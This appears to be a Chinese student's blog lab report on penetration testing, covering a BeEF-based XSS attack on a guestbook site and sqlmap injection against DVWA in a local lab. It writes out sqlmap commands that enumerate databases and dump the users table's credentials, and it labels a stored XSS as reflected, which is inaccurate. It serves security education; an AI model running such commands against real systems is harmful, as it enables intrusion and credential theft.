网络渗透测试学习三之XSS和SQL注入

最新推荐文章于 2023-09-01 17:55:09 发布
最新推荐文章于 2023-09-01 17:55:09 发布
阅读量570 收藏 1
点赞数 2
分类专栏: 渗透测试 安全 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forces_/article/details/109753343
版权

实验目的:

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建:

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

这里我在本地搭建了一个IIS用来进行实验。参考网站

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者劫持。
1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。
在这里插入图片描述

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

,截图。

在这里插入图片描述

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
在这里插入图片描述
在这里插入图片描述

5、回答问题:实验中XSS攻击属于哪种类型?

XSS属于反射型攻击。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在输入框输入1,返回
在这里插入图片描述

ID: 1
First name: admin
Surname: admin
返回正常;

再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

此时可以断定有SQL注入漏洞,
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

2、枚举当前使用的数据库名称和-用户名。
在这里插入图片描述

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --current-db --current-user
在这里插入图片描述

3、枚举数据库用户名和密码
在这里插入图片描述

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --users --password

在这里插入图片描述

4、枚举数据库
–dbs:枚举当前数据库

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --dbs
在这里插入图片描述

5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” --tables

在这里插入图片描述

6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” -T users --columns
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储数据表项

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” -T users -C “user_id,user,password” --dump
在这里插入图片描述
在这里插入图片描述

tips : 查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

因为做实验的时候连续几次做完都忘记截屏导致很烦躁…就省略着放图了 …再此提醒各位做实验的过程中要注意ip地址的填写…我就是因为ip地址填错而浪费了很多时间…如有问题欢迎指出…也欢迎在评论区留言。

佛系的新仔
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
复现awvs——XSS(反射型)漏洞
记录并分享学习安全的知识点..
12-29 2795
1.首先通过awvs对网站进行扫描如下: 2. 判断为xss反射型漏洞,然后打开目标网站,首先先找到变量ref 3.可以看出被隐藏了,将type值改为text文本框,进行复现
复现awvs——sql注入漏洞(时间盲注)
记录并分享学习安全的知识点..
01-14 1543
一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入 按注入方式分 • 报错注入 • 盲注 • 布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 、漏洞复现——bp联合xray,手测加sqlmap爆破 xray开
复现XSS漏洞及分析
qq_61739597的博客
09-01 1900
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)
东隅的博客
09-17 1433
本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)。本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解。这个靶站其实可以说是我出的第一道web题吧,里面藏了个flag,拼接为一个完整的flag个flag的位置分别在:数据库中、admin用户的cookie中、网站源码文件flag.php中,分别对应sql注入漏洞、xss漏洞、文件上传漏洞,我想出第四个flag部分,对应csrf漏洞。
SQL注入修复、XSS漏洞 过滤器及Cookie劫持攻击
qq_43420577的博客
05-29 771
然后在WEB.XML里面配置。一、解决sql注入问题。、cookie劫持。
BugKu Web WriteUp
AlexYoung28的博客
08-24 2174
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
AWVS使用教程
热门推荐
Jim的博客
09-05 3万+
工具分为 4大块。简要概述我们最相关的3部分  1) web scanner: 扫描器,默认情况产生10个线程的爬虫  2) 工具箱: 集成很多好用的工具,比如 http fuzzer  3) 配置: 呵呵,只要懂英文就看得明白  1.点击new scan,启动扫描 注意:可以设置扫描重点,默认15种配置如下: 扫描结果分析
网络渗透测试 XSSSQL注入
12-02
了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
扫描sql注入xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用的工具,很好有效辅助你们对网站的渗透测试
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
实验 XSSSQL注入
qq_65950075的博客
11-20 1034
首先将实验文件夹中的GuestBook文件夹复制到win2003server虚拟机(在此之前要先安装VMtools),然后找到IIS(路径为 开始->程序->管理工具->IIS),在IIS里添加网站,设置好IP、权限和端口等之后,要在Web服务扩展中将 Active Server Pages 设置为允许(不一定是默认允许的),否则无法打开网站。beef打开后,弹出beef登录的网页,网址改为自己的kali机IP,然后登录,默认账号密码都为beef,现在可能要自己改。
常见web漏洞(awvs、nessus)验证方法小记-低危漏洞
weixin_43875708的博客
03-12 1万+
文章目录1.【低危】未加密的连接(Unencrypted connection)漏洞描述漏洞危害漏洞证明修复建议2.【低危】SSL弱加密(主机漏洞)漏洞描述漏洞危害漏洞证明修复建议【低危】Cookie中缺少HttpOnly标志(Cookie(s) without HttpOnly flag set)漏洞描述漏洞危害漏洞证明修复建议【低危】Cookie中缺少secure属性(Cookie(s) wi...
AWVS14.7sql注入部分源码分析
Ciyaso的博客
04-16 1617
AWVS-SQL注入部分源码分析 **PS:**在文章中我会对一些句式进行缩进,文字默认定格,输入缩进对应着代码缩进,所以请注意我的段落缩进。 classErrorBasedSQLInjection.inc classSQLErrorMessages() this.plainArray 存储常见的sql注入报错信息,如 'Microsoft OLE DB Provider for ODBC Drivers', 'Error Executing Database Query', 'Microsoft OLE
续Web应用扫描AWVS,和新-SQL注入类型
BITTER的博客
07-21 466
Acunetic Web Vulnerability Scanner ,就是主要学习了这个软件的基本使用方法,对于网站漏洞有着很好的检测作用 Xshell(用来在windows中连接远程不同系统的服务器)、堡垒机(用来监控运维人员的相关操作,例如对网络设备、安全设备、服务器的操作) 还有一个:初步接触了解了sql注入类型: ...
DWVA XSS(DOM型)
weixin_44023403的博客
12-27 515
DWVA XSS(DOM型)XSSXSS (DOM型)lowMediumHigh XSS XSS的实质其实是HTML代码与Javscript代码的注入。但由于XSS的攻击对象是与客户对等的Browser端,因此常常不被开发者所重视。 一般意义上的XSS通常可以用简单的方法检测出来:当用户输入中某个参数的全部或其中一部分,原封不动地在源代码里出现时,我们就可以认为这个参数存在XSS漏洞。 XSS (DOM型) DOM XSS的产生并没有和后台服务器产生交互,而是通过浏览器的dom树解析产生的。 low 源码
SQL注入XSS攻击
neverSaynever_的博客
02-20 1545
攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。这里不仅仅 div 的内容被注入了,而且 input 的 value 属性也被注入, alert 会弹出两次。我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。XSS 攻击是页面被注入了恶意的代码,为了更形象的介绍,我们用发生在小明同学身边的事例来进行说明。
xss攻击 SQL注入
qq_65208982的博客
06-10 940
QL注入,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。SQL 注入一般发生在用户交互场景中,比如需要用户自已输入信息的输入框,或者下拉选择选项的这种,如果不做好输入内容的过滤,就很可能发生 SQL 注入。
实验二、XSSSQL注入
weixin_30525825的博客
05-21 539
一、 实验目的 了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 二、 系统环境:Kali Linux2、Windows 网络环境:交换网络结构 四、 实验工具:AWVS(Acunetix Web Vulnar...
学习渗透测试学习回顾
最新发布
03-22
5. 学习漏洞分析和利用:了解常见的漏洞类型,如SQL注入XSS、CSRF等,并学习如何分析和利用这些漏洞。 6. 学习安全防护措施:了解常见的安全防护措施,如防火墙、入侵检测系统(IDS)、入侵防御系统(IPS)等,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值